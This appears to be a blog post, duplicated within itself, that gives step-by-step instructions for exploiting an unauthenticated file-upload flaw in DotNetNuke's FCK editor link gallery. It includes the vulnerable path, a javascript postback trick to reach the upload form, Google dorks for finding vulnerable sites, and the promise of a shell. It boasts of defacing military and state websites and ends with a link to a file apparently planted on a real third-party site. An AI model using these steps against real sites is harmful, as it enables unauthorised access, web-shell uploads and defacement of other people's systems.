This BUG Discover by Pakistani Researchers
DNN(DotNetNuke) Collection All Edition Distant Computer file Publish without Authentication
Bug Found By WARRIOR
Over 10 military website and 20 state of United State of america Defaced by this bug
Find DNN path then go to this file
Select : File ( A File On Your Site )
after Loading then Put this Code instead URL
now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell
Here is the way of hacking site by portal.....
Step 1 :
Step 2:- Now enter this
this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
with
this
Step 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package
Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....
Congrats You just hacked a site..
DNN(DotNetNuke) Collection All Edition Distant Computer file Publish without Authentication
Bug Found By WARRIOR
Over 10 military website and 20 state of United State of america Defaced by this bug
Find DNN path then go to this file
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxSelect : File ( A File On Your Site )
after Loading then Put this Code instead URL
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell
Here is the way of hacking site by portal.....
Step 1 :
Code:
WwW.Google.CoMStep 2:- Now enter this
Code:
:inurl:/tabid/36/language/en-US/Default.aspx
Code:
inurl:"portals/0/"this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
Code:
/Home/tabid/36/Language/en-US/Default.aspxwith
this
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxStep 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package
Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....
Congrats You just hacked a site..
Code:
http://www.essegielle.it/portals/0/2.swf
No comments:
Post a Comment